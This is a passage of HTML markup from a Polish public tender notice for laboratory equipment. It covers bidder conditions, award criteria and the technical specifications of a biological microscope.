cieplarka laboratoryjna, zmywarka z funkcją wyparzania) do siedziby Zamawiającegob)	Objęcie sprzętu laboratoryjnego (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarko - zamrażarki laboratoryjne - 2 szt, cieplarka laboratoryjna, zmywarka z funkcją wyparzania) serwisem gwarancyjnym</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">38510000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33191100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39711110-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>38000000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39713100-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-08-30</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-08-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Spełnienie warunku zostanie dokonane na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia (załącznik nr 3 do SIWZ). </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, o ile wykonawca dołączy do oferty oświadczenie (załącznik nr 3 do SIWZ), że na dzień składania ofert spełnia warunki udziału w postępowaniu oraz braku podstaw do wykluczenia.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">W zakresie złożenia oferty dla Pakietu I, II, III. Zamawiający wymaga wykazania przez Wykonawcę, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy - w tym okresie, wykonał co najmniej trzy dostawy na urządzenia wyspecyfikowane w pakiecie I, II, II. Na potwierdzenie spełnienia powyższego warunku Wykonawca winien złożyć wykaz (załącznik nr 3a do SIWZ), wraz z podaniem wartości dostaw, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie. Dowodami dostaw są referencje i inne dokumenty, określające czy dostawy zostały wykonane w sposób należyty.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej (CEIDG) , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust.5 pkt.1 ustawy - wystawionego nie wcześniej niż 6 miesięcy przed dniem składania ofert. Informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt. 13,14 i 21 ustawy PZP wystawionej nie wcześniej niż 6 miesięcy przed dniem składania ofert. Oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności. Oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne. Oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ust. z dn. 12.01.1991 r. o podatkach i opłatach lokalnych (t.j. Dz. U. z 2017 r. poz. 1785, 2141).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Formularz oferty, pełnomocnictwo do podpisania oferty, oryginalnych ulotek producenta, katalogów, dokumentacji technicznej w języku polskim potwierdzającej wymagane parametry zamawianego przedmiotu zamówienia - w zakresie niezbędnym do oceny parametrów bezwzględnie wymaganych (nie ocenianych). </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin dostaw</TD><TD style='border: 1px solid black;border-collapse: collapse;'>25,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>udzielona gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data"></span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina"></span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30 dni</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>jeden mikroskop biologiczny </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Warunki techniczne i wyposażenie:	Wymagania:Stan mikroskopu/ rok produkcji	Fabrycznie nowy , rok produkcji 2019Optyka	o	Korygowana do nieskończonościStatyw	o	Uchwyt rewolwerowy obiektywów min. 6 gniazdowy z osobnymi gniazdami na suwaki kontrastu Nomarskiego dla każdego obiektywuo	Możliwość wbudowania w statyw portu bocznego dla kamery cyfrowej zapewniającego podział światła pomiędzy okulary i kamerę w stosunku 50% : 50% albo 100% : 0% / 0% : 100%o	Współosiowe śruby mikro/makro do ustawiania ostrości, położone na jednej wysokości z pokrętłami sterowania stolikiem, o	Blokada ostrości, pozwalająca na zapamiętanie pozycji ostrościo	Statyw wyposażony w klasyczny kontrast Nomarskiego/DIC oraz opcjonalnie w kontrast fazowyo	Możliwość rozbudowy o kontrast Nomarskiego z regulacją siły kontrastu widzenia, dostosowany do pracy z plastikowymi naczynkami hodowlanymio	Koło filtrów do światła przechodzącego, minimum 6-cio pozycyjne z filtrami neutralnymi oraz filtrem konwersyjnymo	Możliwość rozbudowy o fluorescencję LEDOświetlacz halogenowy	o	Oświetlacz halogenowy minimum 50 WATTubus	Szerokopolowy tubus binokularowy z portem kamery (podział światła 50:50%), z regulacją rozstawu źrenic w zakresie 55 ... 74 mm, kąt 30 stopni, pole widzenia min 23 mmOkulary	o	Powiększenie 10xo	Szerokopolowe, pole widzenia min. 23 mmObiektywy o	5x / apertura 0,12, planachromat, odl. robocza 10,1 mmo	10x / apertura 0,25, planachromat, odl. robocza 4,5 mmo	